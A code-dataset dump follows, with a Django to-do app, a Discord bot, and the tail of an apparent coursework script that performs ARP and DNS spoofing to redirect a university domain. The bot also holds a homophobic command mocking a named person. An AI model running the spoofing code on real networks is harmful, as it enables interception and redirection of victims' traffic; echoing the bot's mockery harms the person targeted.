b'www.nycu.edu.tw'\n\tredirect_ip = '140.113.207.241'\n\n\tscapy_pkt = scapy.IP(pkt.get_payload()) \t# convert the packet into scapy packet\n\t\n\tif scapy_pkt.haslayer(scapy.DNSRR): \t\t# DNS Resource Record\n\t\tqname = scapy_pkt[scapy.DNSQR].qname \t# extract the domain name\n\n\t\tif domain_name in qname:\n\t\t\tfake_answer = scapy.DNSRR(rrname=qname, rdata=redirect_ip)\n\t\t\tscapy_pkt[scapy.DNS].an = fake_answer\n\t\t\tscapy_pkt[scapy.DNS].ancount = 1\n\n\t\t\tdel scapy_pkt[scapy.IP].len\n\t\t\tdel scapy_pkt[scapy.IP].chksum\n\t\t\tdel scapy_pkt[scapy.UDP].len\n\t\t\tdel 
scapy_pkt[scapy.UDP].chksum\n\n\t\t\tpkt.set_payload(bytes(scapy_pkt))\n\n\tpkt.accept()\n\n\ndef pharming_attack(thread, terminate):\n\tprint(\"\\nStart pharming ...\")\n\tnfqueue = NetfilterQueue()\n\ttry:\n\t\tnfqueue.bind(0, modify_packet)\n\t\tnfqueue.run()\n\texcept KeyboardInterrupt:\n\t\tprint(\"\\nDetected CTRL + C pressed and Exiting ...\")\n\t\tterminate.set()\n\t\tthread.join()\n\t\tnfqueue.unbind()\n\t\tend_command()\n\t\tprint(\"Stop pharming\")\n\n\ndef main():\n\tif os.geteuid() != 0:\n\t\texit(f'{__file__}: Permission denied')\n\t\n\tstart_command()\n\tattacker_ip, attacker_mac, gateway_ip, gateway_mac, victims = get_device_info()\n\n\tterminate = threading.Event()\n\tarp_thread = threading.Thread(\n\t\ttarget=arp_spoofing, \n\t\targs=(gateway_ip, gateway_mac, victims, terminate), \n\t\tdaemon=True\n\t)\n\tarp_thread.start()\n\tpharming_attack(arp_thread, terminate)\n\n\nif __name__ == '__main__':\n\tmain()", "repo_name": "DW1209/MITM-and-Pharming-Attacks-in-Wi-Fi-Networks", "sub_path": "pharm_attack.py", "file_name": "pharm_attack.py", "file_ext": "py", "file_size_in_byte": 4111, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "32", "api": [{"api_name": "os.system", "line_number": 15, "usage_type": "call"}, {"api_name": "os.system", "line_number": 16, "usage_type": "call"}, {"api_name": "os.system", "line_number": 17, "usage_type": "call"}, {"api_name": "os.system", "line_number": 21, "usage_type": "call"}, {"api_name": "os.system", "line_number": 22, "usage_type": "call"}, {"api_name": "scapy.all.get_if_addr", "line_number": 26, "usage_type": "call"}, {"api_name": "scapy.all", "line_number": 26, "usage_type": "name"}, {"api_name": "scapy.all.conf", "line_number": 26, "usage_type": "attribute"}, {"api_name": "scapy.all.get_if_hwaddr", "line_number": 27, "usage_type": "call"}, {"api_name": "scapy.all", "line_number": 27, "usage_type": "name"}, {"api_name": "scapy.all.conf", "line_number": 27, "usage_type": "attribute"}, {"api_name": "netifaces.gateways", "line_number": 29, "usage_type": "call"}, {"api_name": "netifaces.AF_INET", "line_number": 29, "usage_type": "attribute"}, {"api_name": "netifaces.ifaddresses", "line_number": 30, "usage_type": "call"}, {"api_name": "netifaces.AF_INET", "line_number": 30, "usage_type": "attribute"}, {"api_name": "math.log2", "line_number": 31, "usage_type": "call"}, {"api_name": "scapy.all.arping", "line_number": 35, "usage_type": "call"}, {"api_name": "scapy.all", "line_number": 35, "usage_type": "name"}, {"api_name": "scapy.all.ARP", "line_number": 54, "usage_type": "call"}, {"api_name": "scapy.all", "line_number": 54, "usage_type": "name"}, {"api_name": "scapy.all.send", "line_number": 55, "usage_type": "call"}, {"api_name": "scapy.all", "line_number": 55, "usage_type": "name"}, {"api_name": "scapy.all.ARP", "line_number": 59, "usage_type": "call"}, {"api_name": "scapy.all", "line_number": 59, "usage_type": "name"}, {"api_name": "scapy.all.send", "line_number": 60, "usage_type": "call"}, {"api_name": "scapy.all", "line_number": 60, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 74, "usage_type": "call"}, {"api_name": "scapy.all.IP", "line_number": 92, "usage_type": "call"}, {"api_name": "scapy.all", "line_number": 92, "usage_type": "name"}, {"api_name": "scapy.all.DNSRR", "line_number": 94, "usage_type": "attribute"}, {"api_name": "scapy.all", "line_number": 94, "usage_type": "name"}, {"api_name": "scapy.all.DNSQR", "line_number": 95, "usage_type": "attribute"}, 
{"api_name": "scapy.all", "line_number": 95, "usage_type": "name"}, {"api_name": "scapy.all.DNSRR", "line_number": 98, "usage_type": "call"}, {"api_name": "scapy.all", "line_number": 98, "usage_type": "name"}, {"api_name": "scapy.all.DNS", "line_number": 99, "usage_type": "attribute"}, {"api_name": "scapy.all", "line_number": 99, "usage_type": "name"}, {"api_name": "scapy.all.DNS", "line_number": 100, "usage_type": "attribute"}, {"api_name": "scapy.all", "line_number": 100, "usage_type": "name"}, {"api_name": "scapy.all.IP", "line_number": 102, "usage_type": "attribute"}, {"api_name": "scapy.all", "line_number": 102, "usage_type": "name"}, {"api_name": "scapy.all.IP", "line_number": 103, "usage_type": "attribute"}, {"api_name": "scapy.all", "line_number": 103, "usage_type": "name"}, {"api_name": "scapy.all.UDP", "line_number": 104, "usage_type": "attribute"}, {"api_name": "scapy.all", "line_number": 104, "usage_type": "name"}, {"api_name": "scapy.all.UDP", "line_number": 105, "usage_type": "attribute"}, {"api_name": "scapy.all", "line_number": 105, "usage_type": "name"}, {"api_name": "netfilterqueue.NetfilterQueue", "line_number": 114, "usage_type": "call"}, {"api_name": "os.geteuid", "line_number": 128, "usage_type": "call"}, {"api_name": "threading.Event", "line_number": 134, "usage_type": "call"}, {"api_name": "threading.Thread", "line_number": 135, "usage_type": "call"}]}
+{"seq_id": "71564070169", "text": "from django.shortcuts import render, redirect\nfrom .forms import listForm\n\nfrom .models import List\n\n\n# Create your views here.\ndef search_tasks(request):\n if request.method == 'GET':\n user_search = request.GET.get('search') or ''\n returned_item = List.objects.filter(task__icontains=user_search)\n context = {\n 'tasks': returned_item\n }\n return render(request, 'index.html', context)\n\n\ndef task_view(request):\n tasks = List.objects.all()\n context = {'tasks': tasks}\n return render(request, 'index.html', context)\n\n\ndef add_new_tasks(request):\n if request.method == 'POST':\n form = listForm(request.POST)\n if form.is_valid():\n form.save()\n return redirect('task_view')\n else:\n form = listForm()\n return render(request, 'add.html', {'form': form})\n\n\ndef update_list(request, id):\n task = List.objects.get(id=id)\n form = listForm(request.POST or None, instance=task)\n if form.is_valid():\n form.save()\n return redirect('task_view')\n return render(request, 'update.html', {'form': form})\n\n\ndef delete_item(request, id):\n task = List.objects.get(id=id)\n task.delete()\n return redirect('task_view')\n", "repo_name": "jaden81699/todoList", "sub_path": "todoList/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 1237, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "models.List.objects.filter", "line_number": 11, "usage_type": "call"}, {"api_name": "models.List.objects", "line_number": 11, "usage_type": "attribute"}, {"api_name": "models.List", "line_number": 11, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 15, "usage_type": "call"}, {"api_name": "models.List.objects.all", "line_number": 19, "usage_type": "call"}, {"api_name": "models.List.objects", "line_number": 19, "usage_type": "attribute"}, {"api_name": "models.List", "line_number": 19, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 21, "usage_type": "call"}, {"api_name": "forms.listForm", "line_number": 26, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 29, "usage_type": "call"}, {"api_name": "forms.listForm", "line_number": 31, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 32, "usage_type": "call"}, {"api_name": "models.List.objects.get", "line_number": 36, "usage_type": "call"}, {"api_name": "models.List.objects", "line_number": 36, "usage_type": "attribute"}, {"api_name": "models.List", "line_number": 36, "usage_type": "name"}, {"api_name": "forms.listForm", "line_number": 37, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 40, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 41, "usage_type": "call"}, {"api_name": "models.List.objects.get", "line_number": 45, "usage_type": "call"}, {"api_name": "models.List.objects", "line_number": 45, "usage_type": "attribute"}, {"api_name": "models.List", "line_number": 45, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 47, "usage_type": "call"}]}
+{"seq_id": "27126022627", "text": "# GENERAL BOT FUNCTIONS\n\n# bot.py\nimport googletrans\nimport pytube\n\nimport BeatRequests\nimport Bugs\nfrom Bugs import BugHandler\nfrom Beans import BeanHandler\nfrom Movies import MovieHandler\nimport Music\nimport glob\nimport math\nimport os\nimport random\nimport time\nimport asyncio\nimport datetime\nimport math\nimport feedparser\nfrom bs4 import BeautifulSoup\n\nimport discord\nfrom discord.ext import commands\nfrom dotenv import load_dotenv\nfrom googletrans import Translator\n\nload_dotenv()\nTOKEN = os.getenv('DISCORD_TOKEN')\nGUILD = os.getenv('DISCORD_GUILD')\nADMINID = int(os.getenv('DISCORD_ADMINID'))\n\nidentifier = os.getenv('IDENTIFIER_STR')\n\nintents = discord.Intents().default()\nintents.members = True\n\nbot = commands.Bot(command_prefix='+', intents=intents)\nbot.remove_command('help')\n\nbeanHandler = BeanHandler()\nbugHandler = BugHandler()\nmovieHandler = MovieHandler(0)\nreqManager = BeatRequests.BSReqHandler()\n\nmusicDict = dict()\n# service_urls=['translate.googleapis.com']\ntranslator = Translator()\n\n\n# START OF BOT COMMANDS\n\n@bot.event\nasync def on_ready():\n    currentSongIndex = 0\n    print(\n        f'{bot.user} is Online!'\n    )\n\n\n# HELP CMDS ----------------------------------------------------------------------------- ###\n\n@bot.command(name=\"help\")\nasync def help(ctx):\n    print(str(ctx.author.id))\n    outStr = \"COMMANDS:\"\n    outStr += \"\\n+musicHelp: Explains how to request, skip, and manage songs\"\n    outStr += \"\\n+movieHelp: Explains how to add, remove, and view requested movies\"\n    outStr += \"\\n+beanHelp: Explains the Beanking System(tm)\"\n    outStr += \"\\n+sCasm(comment): Makes a comment sarcastic\"\n    outStr += \"\\n+myIQ: Accurate IQ reading\"\n    outStr += \"\\n+pfpGrabMe: Grabs ya PFP son\"\n    outStr += \"\\n+pfpGrabYou(Mention User): Grabs someone's PFP son\"\n    outStr += \"\\n+goodBot: He is a good bot after all\"\n    await ctx.send(outStr)\n\n\n@bot.command()\nasync def beanHelp(ctx):\n    outStr = \"BEAN COMMANDS:\"\n    outStr += \"\\n+beanCounter: Shows your Beank Statement\"\n    outStr += \"\\n+beanMe: High Quality Beanking(c)\"\n    await ctx.send(outStr)\n\n\n@bot.command()\nasync def movieHelp(ctx):\n    outStr = \"MOVIE COMMANDS:\"\n    outStr += \"\\n+movieLS: Lists currently requested movies\"\n    outStr += \"\\n+movieADD(name): Adds a movie to the list\"\n    outStr += \"\\n+movieDEL(index): Removes a movie at index from the list\"\n    outStr += \"\\n+movieRAND: Picks a movie! 
( Don't use this one yet ;) )\"\n await ctx.send(outStr)\n\n\n@bot.command(aliases=['songHelp'])\nasync def musicHelp(ctx):\n outStr = \"MUSIC COMMANDS:\"\n outStr += \"\\n+play(search term / YouTube link): Plays a song or adds it to the queue\"\n outStr += \"\\n+skip: Skips the current song\"\n outStr += \"\\n+queue: Lists the current song queue\"\n await ctx.send(outStr)\n\n\n# FUN CMDS ------------------------------------------------------------------------------ ###\n\n@bot.command()\nasync def arabify(ctx, *args):\n sarcStr = reverseChars(args)\n await ctx.send(sarcStr)\n\n\n@bot.command(aliases=[\"CAT\", \"CATME\", \"catme\", \"cat\"])\nasync def catMe(ctx):\n embed = discord.Embed(\n title='Random Image 🐈',\n description='Random',\n colour=discord.Colour.purple()\n )\n embed.set_image(url='https://source.unsplash.com/1600x900/?cat')\n embed.set_footer(text=\"\")\n await ctx.send(embed=embed)\n\n\n@bot.command(aliases=[\"XKCD\", \"xkcd\", \"xme\", \"XME\", \"XkMe\", \"XKME\"])\nasync def xkme(ctx):\n Feed = feedparser.parse(\"https://xkcd.com/rss.xml\")\n pointer = Feed.entries[0]\n soup = BeautifulSoup(pointer.description, \"html.parser\")\n\n embed = discord.Embed(\n title=\"XKCD \" + pointer.link.split('/')[3] + \" - \" + pointer.title,\n colour=discord.Colour.dark_gray()\n )\n embed.set_image(url=soup.img[\"src\"])\n embed.set_footer(text=soup.img[\"alt\"])\n await ctx.send(embed=embed)\n\n\n@bot.command(aliases=[\"Troll\", \"TROLL\"])\nasync def troll(ctx, user: discord.User):\n if ctx.author.id != ADMINID:\n return\n for i in range(10):\n await asyncio.sleep(1)\n await ctx.send(f\"HEY <@{user.id}>\")\n\n\n@bot.command()\nasync def goom(ctx):\n destStr = random.choice(list(googletrans.LANGCODES.items()))[1]\n result = translator.translate(\"Good Morning\", src=\"en\", dest=destStr)\n await ctx.send(result.text)\n\n\n@bot.command()\nasync def sCasm(ctx, *args):\n sarcStr = sarcasify(args)\n await ctx.send(sarcStr)\n i = beanHandler.account_from_id(ctx.author.id)\n gain = random.randint(5, 20)\n beanHandler.add_beans(gain)\n\n\n@bot.command()\nasync def doomsgay(ctx):\n if ctx.author.id != ADMINID:\n return\n doomTime = datetime.datetime(2025, 9, 9, 0, 0, 0) - datetime.datetime.now()\n outStr = \"Ricky will become homosexual in \"\n years = math.floor(doomTime.days / 365.25)\n days = doomTime.days - math.floor(years * 365.25)\n hours = math.floor(doomTime.seconds / 3600)\n minutes = math.floor(doomTime.seconds / 60) - hours * 60\n outStr += str(years) + \" years, \"\n outStr += str(days) + \" days, \"\n outStr += str(hours) + \" hours, \"\n outStr += str(minutes) + \" minutes\"\n await ctx.send(outStr)\n\n\n@bot.command()\nasync def myIQ(ctx):\n if ctx.author.id == ADMINID:\n # g*mer IQ\n await ctx.send(\"Loochis Daddy's IQ is: 300\")\n else:\n # pleb IQ\n random.seed(ctx.author.id)\n await ctx.send(ctx.author.name + \"'s IQ is: \" + str(random.randint(10, 90)))\n\n\n@bot.command()\nasync def pfpGrabMe(ctx):\n await ctx.send(str(ctx.author.avatar_url))\n\n\n@bot.command()\nasync def pfpGrabYou(ctx, user: discord.User):\n await ctx.send(str(user.avatar_url))\n\n\n@bot.command()\nasync def cringe(ctx):\n await ctx.send(str.upper(random.choice(ctx.guild.members).name) + \" IS CRINGE!\")\n i = beanHandler.account_from_id(ctx.author.id)\n gain = random.randint(5, 20)\n beanHandler.add_beans(gain)\n await ctx.send(\"+\" + str(gain) + \" BND\")\n\n\n@bot.command()\nasync def goodBot(ctx):\n await ctx.send(\"thanks B0s\")\n i = beanHandler.account_from_id(ctx.author.id)\n gain = 
random.randint(5, 20)\n    beanHandler.add_beans(gain)\n    await ctx.send(\"+\" + str(gain) + \" BND\")\n\n\n# BEAN CMDS ----------------------------------------------------------------------------- ###\n\n@bot.command()\nasync def beanMe(ctx):\n    i = beanHandler.account_from_id(ctx.author.id)\n    gain = random.randint(5, 20)\n    oldBal = beanHandler.beanAccount.beans\n    beanHandler.add_beans(gain)\n    if i == 0:\n        await ctx.send(ctx.author.name + \"'s Bean Account has been successfully created!\")\n\n    await ctx.send(str.upper(ctx.author.name) + \" GOT BEANED: \\n```\\nOld Balance: \" + numFormat(\n        oldBal) + \"Transaction: \" + numFormat(gain) + lineFormat() + \"New Balance: \" + balFormat(beanHandler) + \"```\")\n\n\n@bot.command()\nasync def beanYou(ctx, user: discord.User, *args):\n    outAcc = beanHandler.account_from_id(ctx.author.id)\n    gain = int(args[0])\n    oldBal = beanHandler.beanAccount.beans\n    newBal = oldBal - gain\n    if outAcc == 0:\n        await ctx.send(ctx.author.name + \"'s Bean Account has been successfully created!\")\n    if beanHandler.beanAccount.beans - gain < 0:\n        await ctx.send(ctx.author.name + \", You don't have enough BND to perform this Beansaction\")\n        return\n    beanHandler.add_beans(-gain)\n    inAcc = beanHandler.account_from_id(user.id)\n    if inAcc == 0:\n        await ctx.send(user.name + \"'s Bean Account has been successfully created!\")\n\n    await ctx.send(str.upper(ctx.author.name) + \" BEANED \" + str.upper(user.name) + \"\\n```\\nOld Balance: \" + numFormat(\n        oldBal) + \"Transaction: \" + numFormat(-gain) + lineFormat() + \"New Balance: \" + numFormat(newBal) + \"```\")\n    oldBal = beanHandler.beanAccount.beans\n    beanHandler.add_beans(gain)\n    await ctx.send(\n        str.upper(user.name) + \" GOT BEANED BY \" + str.upper(ctx.author.name) + \"\\n```\\nOld Balance: \" + numFormat(\n            oldBal) + \"Transaction: \" + numFormat(gain) + lineFormat() + \"New Balance: \" + balFormat(\n            beanHandler) + \"```\")\n\n\n@bot.command()\nasync def beanCounter(ctx):\n    i = beanHandler.account_from_id(ctx.author.id)\n    if i == 0:\n        await ctx.send(ctx.author.name + \"'s Bean Account has been successfully created!\")\n\n    await ctx.send(ctx.author.name + \"'s Bean Account: \\n```\\nBalance: \" + balFormat(beanHandler) + \"```\")\n\n\n# BUG CMDS ------------------------------------------------------------------------------ ###\n\n@bot.command(aliases=[\"sawbug\", \"SAWBUG\", \"sawbugs\", \"SAWBUGS\", \"sawBugs\"])\nasync def sawBug(ctx, *args):\n    gain = 1\n    if len(args) != 0 and int(args[0]) > 1:\n        gain = int(args[0])\n    i = bugHandler.account_from_id(ctx.author.id)\n    bugHandler.add_sightings(gain)\n    if i == 0:\n        await ctx.send(ctx.author.name + \" Saw their first bug!\\nWELCOME TO THE THUNDERDOME\")\n\n    if gain == 1:\n        await ctx.send(str.upper(ctx.author.name) + \" saw a bug!\")\n    else:\n        await ctx.send(str.upper(ctx.author.name) + \" saw \" + str(gain) + \" bugs!\")\n\n\n@bot.command(aliases=[\"killedbug\", \"KILLEDBUG\", \"killedbugs\", \"KILLEDBUGS\", \"killedBugs\"])\nasync def killedBug(ctx, *args):\n    gain = 1\n    if len(args) != 0 and int(args[0]) > 1:\n        gain = int(args[0])\n    i = bugHandler.account_from_id(ctx.author.id)\n    bugHandler.add_kills(gain)\n    bugHandler.add_sightings(gain)\n    if i == 0:\n        await ctx.send(ctx.author.name + \" Killed their first bug!\\nWELCOME TO THE THUNDERDOME\")\n\n    if gain == 1:\n        await ctx.send(str.upper(ctx.author.name) + \" \" + random.choice(Bugs.KILLED_SYNONYMS) + \" a bug!\")\n    else:\n        await ctx.send(\n            str.upper(ctx.author.name) + \" \" + random.choice(Bugs.KILLED_SYNONYMS) + \" \" + 
str(gain) + \" bugs!\")\n\n@bot.command(aliases=[\"killedseenbug\", \"KILLEDSEENBUG\"])\nasync def killedSeenBug(ctx):\n    bugHandler.account_from_id(ctx.author.id)\n    if bugHandler.bugAccount.kills >= bugHandler.bugAccount.sightings:\n        await ctx.send(\"Somethin' Ain't right here\")\n        return\n    bugHandler.add_kills(1)\n\n    await ctx.send(\n        str.upper(ctx.author.name) + \" \" + random.choice(Bugs.KILLED_SYNONYMS) + \" One that got away!\")\n\n\n@bot.command()\nasync def bugStats(ctx, user: discord.User = None):\n    if user is None:\n        user = ctx.author\n    i = bugHandler.account_from_id(user.id)\n    if i == 0:\n        await ctx.send(user.name + \" hasn't committed bug crimes yet :(\")\n        return\n    if bugHandler.bugAccount.kills != 0:\n        await ctx.send(ctx.author.name + \"'s Bug crimes: \\n```\\nKills: \" + str(bugHandler.bugAccount.kills) + \"\\nSightings: \"\n                       + str(bugHandler.bugAccount.sightings) + \"\\nK/S: \"\n                       + '{0:.3g}'.format(bugHandler.bugAccount.kills / bugHandler.bugAccount.sightings) + \"```\")\n    else:\n        await ctx.send(\n            ctx.author.name + \" is a pacifist :( \\n```\\nKills: \" + str(bugHandler.bugAccount.kills) + \"\\nSightings: \"\n            + str(bugHandler.bugAccount.sightings) + \"```\")\n\n\n# MOVIE CMDS ---------------------------------------------------------------------------- ###\n\n@bot.command()\nasync def movieLS(ctx):\n    movieHandler = MovieHandler(ctx.guild.id)\n    movieHandler.get_movies()\n    if len(movieHandler.movies) != 0:\n        await ctx.send(\"Here are the currently requested movies:\\n```\" + movieHandler.moviesToOrderedString() + \"\\n```\")\n    else:\n        await ctx.send(\"There are no requested movies!\")\n\n\n@bot.command()\nasync def movieADD(ctx, *args):\n    movieHandler = MovieHandler(ctx.guild.id)\n    movieHandler.get_movies()\n    name = ' '.join([x for x in args])\n    movieHandler.add_movie(name)\n\n    await ctx.send(\"Successfully Added **\" + name + \"**\")\n    await ctx.send(\"Here are the currently requested movies:\\n```\" + movieHandler.moviesToOrderedString() + \"\\n```\")\n\n\n@bot.command()\nasync def movieDEL(ctx, *args):\n    movieHandler = MovieHandler(ctx.guild.id)\n    movieHandler.get_movies()\n    try:\n        name = movieHandler.del_movie(int(args[0]))\n    except:\n        await ctx.send(\"Must be a valid index!\")\n        return\n\n    await ctx.send(\"Successfully Deleted **\" + name + \"**\")\n    if len(movieHandler.movies) != 0:\n        await ctx.send(\"Here are the currently requested movies:\\n```\" + movieHandler.moviesToOrderedString() + \"\\n```\")\n    else:\n        await ctx.send(\"There are no requested movies!\")\n\n\n@bot.command()\nasync def movieRAND(ctx):\n    movieHandler = MovieHandler(ctx.guild.id)\n    movieHandler.get_movies()\n    if len(movieHandler.movies) != 0:\n        await ctx.send(\"PICKING FROM A HAT...\")\n        await asyncio.sleep(2)\n        await ctx.send(\"3...\")\n        await asyncio.sleep(2)\n        await ctx.send(\"2...\")\n        await asyncio.sleep(2)\n        await ctx.send(\"1...\")\n        await asyncio.sleep(2)\n        await ctx.send(\"0.5...\")\n        await asyncio.sleep(2)\n        await ctx.send(\"0.25...\")\n        await asyncio.sleep(2)\n        await ctx.send(\"0.125...\")\n        await asyncio.sleep(2)\n        await ctx.send(\"0.0625...\")\n        await asyncio.sleep(2)\n        await ctx.send(\"0... 
FRICK IT ROUNDED DO-\")\n await ctx.send(\"The Chosen Movie is: **\" + random.choice(movieHandler.movies) + \"**\")\n else:\n await ctx.send(\"There are no requested movies!\")\n\n\n# MUSIC CMDS ---------------------------------------------------------------------------- ###\n\n@bot.command(aliases=['p', 'P', 'Play', 'PLAY'])\nasync def play(ctx, *args):\n video = Music.getVideo(args)\n if video is None:\n await ctx.send(\"ERR: Cannot find song.\")\n return\n\n guildID = ctx.guild.id\n if str(guildID) not in musicDict:\n musicDict[str(guildID)] = []\n\n if ctx.author.voice is None:\n await ctx.send(\"ERR: User not in channel.\")\n return\n\n voice_channel = ctx.author.voice.channel\n\n bot_channel = None\n if not (ctx.guild.voice_client is None):\n bot_channel = ctx.guild.voice_client.channel\n\n if bot_channel is not None:\n if voice_channel == bot_channel:\n vc = ctx.guild.voice_client\n else:\n await ctx.send(\"ERR: Bot is in another channel, permission denied.\")\n return\n else:\n await ctx.send(\"Joined VC\")\n vc = await voice_channel.connect()\n\n print(video)\n if len(video) == 1:\n musicDict[str(guildID)].append(video[0])\n if vc.is_playing():\n await ctx.send(\"Queued: **\" + video[0].title + \"**\")\n else:\n for v in video:\n musicDict[str(guildID)].append(v)\n await ctx.send(\"Queued \" + str(len(video)) + \" videos\")\n\n print(len(musicDict[str(guildID)]))\n if not vc.is_playing():\n await playNext(ctx)\n\n\n@bot.command(aliases=['s', 'S', 'Skip', 'SKIP'])\nasync def skip(ctx):\n if ctx.author.voice is None:\n await ctx.send(\"ERR: User not in channel.\")\n return\n\n voice_channel = ctx.author.voice.channel\n bot_channel = None\n if not (ctx.guild.voice_client is None):\n bot_channel = ctx.guild.voice_client.channel\n\n if bot_channel is not None:\n if voice_channel == bot_channel:\n vc = ctx.guild.voice_client\n else:\n await ctx.send(\"ERR: Bot is in another channel, permission denied.\")\n return\n else:\n await ctx.send(\"ERR: Bot not in channel.\")\n return\n\n guildID = ctx.guild.id\n if not musicDict[str(guildID)]:\n await ctx.send(\"Nothing in Queue!\")\n return\n\n try:\n # del musicDict[str(guildID)][0]\n voice_channel = ctx.message.guild.voice_client\n voice_channel.stop()\n await ctx.send(\"Skipped!\")\n except:\n await ctx.send(\"ERR: Nothing playing.\")\n return\n\n # await playNext(ctx)\n\n\nasync def playNext(ctx):\n guildID = ctx.guild.id\n if len(musicDict[str(guildID)]) >= 1:\n await ctx.send(\"Now Playing: **\" + musicDict[str(guildID)][0].title + \"**\")\n if len(musicDict[str(guildID)]) == 0:\n return\n vc = ctx.guild.voice_client\n Music.getYTFile(musicDict[str(guildID)][0], ctx.guild.id)\n vc.play(discord.FFmpegPCMAudio(source=\"Audio/\" + str(ctx.guild.id) + \".mp4\"))\n while vc.is_playing():\n await asyncio.sleep(1)\n del musicDict[str(guildID)][0]\n print(\"Deleted.\")\n await playNext(ctx)\n else:\n await ctx.send(\"Queue Finished!\")\n\n\n@bot.command(aliases=['q', 'Q', 'Queue'])\nasync def queue(ctx, *args):\n guildID = ctx.guild.id\n if str(guildID) not in musicDict:\n musicDict[str(guildID)] = []\n if not musicDict[str(guildID)]:\n await ctx.send(\"Nothing in Queue!\")\n return\n\n pageNum = 1\n if args:\n try:\n pageNum = int(args[0])\n except:\n await ctx.send(\"Invalid Page Number\")\n\n outStr = pageListFormatter([x.title for x in musicDict[str(guildID)]], pageNum)\n\n await ctx.send(outStr)\n\n\n# BEAT SABER REQUEST FUNCS -------------------------------------------------------------- ###\n\n@bot.command(aliases=[\"BS\", \"beatsaber\", 
\"BEATSABER\", \"bs\", \"bsrequest\", \"BEATSABERREQUEST\"])\nasync def BeatSaber(ctx, *args):\n msg = await ctx.send(\"Searching...\")\n url = reqManager.getBeatsaverPage(' '.join(args))\n if url[0:8] == \"https://\":\n await msg.edit(content=\"Verifying...\")\n bsSong = BeatRequests.BSSong(url)\n reqStatus = reqManager.add_req(bsSong)\n if not reqStatus:\n await msg.edit(content=\"Song already in queue!\")\n return\n\n embed = discord.Embed(\n title=\"[{}] \".format(bsSong.id) + bsSong.name,\n description=\"Mapped By: {}\".format(bsSong.mapper),\n colour=discord.Colour.red()\n )\n embed.set_image(url=bsSong.coverArt)\n embed.set_footer(text=bsSong.description)\n embed.add_field(name=\"Votes\", value=\"\\👍 \" + str(bsSong.upvotes) + \" | \\👎\" + str(bsSong.downvotes),\n inline=False)\n await msg.edit(content=\"Successfully added!\", embed=embed)\n else:\n await msg.edit(content=url)\n\n\n@bot.command(aliases=[\"BSLS\", \"beatsaberlist\", \"BEATSABERLIST\", \"bsls\", \"bslist\"])\nasync def BeatSaberList(ctx, *args):\n pageNum = 1\n if args:\n try:\n pageNum = int(args[0])\n except:\n await ctx.send(\"Invalid Page Number\")\n\n reqManager.get_reqs()\n if not reqManager.requests:\n await ctx.send(\"Nothing in Queue!\")\n return\n\n print([x.split(\"\u001f\")[1] for x in reqManager.requests])\n outStr = pageListFormatter([x.split(\"\u001f\")[1] for x in reqManager.requests], pageNum)\n await ctx.send(outStr)\n\n\n# HELPER FUNCS -------------------------------------------------------------------------- ###\n\ndef pageListFormatter(pagedList, pageNum):\n maxPageNum = math.floor(len(pagedList) / 10.0) + 1\n if pageNum < 1:\n pageNum = 1\n if pageNum > maxPageNum:\n pageNum = maxPageNum\n\n outStr = \"Queue Page \" + str(pageNum) + \"/\" + str(maxPageNum) + \":\\n```\"\n outStr += \"\\n>> \" + pagedList[0]\n for i in range((pageNum - 1) * 10, min(pageNum * 10, len(pagedList))):\n outStr += \"\\n(\" + str(i + 1) + \"). 
\" + pagedList[i]\n outStr += \"```\"\n return outStr\n\n\ndef sarcasify(*args):\n random.seed(time.time())\n outStr = '\"'\n for arg in args:\n for argSt in arg:\n for argCh in argSt:\n outStr += random.choice([str.lower(argCh), str.upper(argCh)])\n outStr += \" \"\n outStr += '\"'\n return outStr\n\n\ndef reverseChars(*args):\n outStr = u'\\u202B'\n for arg in args:\n for argSt in arg:\n for argCh in argSt:\n outStr += argCh\n outStr += \" \"\n outStr += u'\\u202B'\n return outStr[::-1]\n\n\ndef balFormat(bHandler):\n return str(bHandler.beanAccount.beans) + \" BND\\n\"\n\n\ndef numFormat(num):\n return str(num) + \" BND\\n\"\n\n\ndef lineFormat():\n return \"-----------------------\\n\"\n\n\nbot.run(TOKEN)\n", "repo_name": "Loochis/LoochisBot", "sub_path": "LoochisBot.py", "file_name": "LoochisBot.py", "file_ext": "py", "file_size_in_byte": 19816, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "31", "api": [{"api_name": "dotenv.load_dotenv", "line_number": 29, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 30, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 31, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 32, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 34, "usage_type": "call"}, {"api_name": "discord.Intents", "line_number": 36, "usage_type": "call"}, {"api_name": "discord.ext.commands.Bot", "line_number": 39, "usage_type": "call"}, {"api_name": "discord.ext.commands", "line_number": 39, "usage_type": "name"}, {"api_name": "Beans.BeanHandler", "line_number": 42, "usage_type": "call"}, {"api_name": "Bugs.BugHandler", "line_number": 43, "usage_type": "call"}, {"api_name": "Movies.MovieHandler", "line_number": 44, "usage_type": "call"}, {"api_name": "BeatRequests.BSReqHandler", "line_number": 45, "usage_type": "call"}, {"api_name": "googletrans.Translator", "line_number": 49, "usage_type": "call"}, {"api_name": "discord.Embed", "line_number": 116, "usage_type": "call"}, {"api_name": "discord.Colour.purple", "line_number": 119, "usage_type": "call"}, {"api_name": "discord.Colour", "line_number": 119, "usage_type": "attribute"}, {"api_name": "feedparser.parse", "line_number": 128, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 130, "usage_type": "call"}, {"api_name": "discord.Embed", "line_number": 132, "usage_type": "call"}, {"api_name": "discord.Colour.dark_gray", "line_number": 134, "usage_type": "call"}, {"api_name": "discord.Colour", "line_number": 134, "usage_type": "attribute"}, {"api_name": "discord.User", "line_number": 142, "usage_type": "attribute"}, {"api_name": "asyncio.sleep", "line_number": 146, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 152, 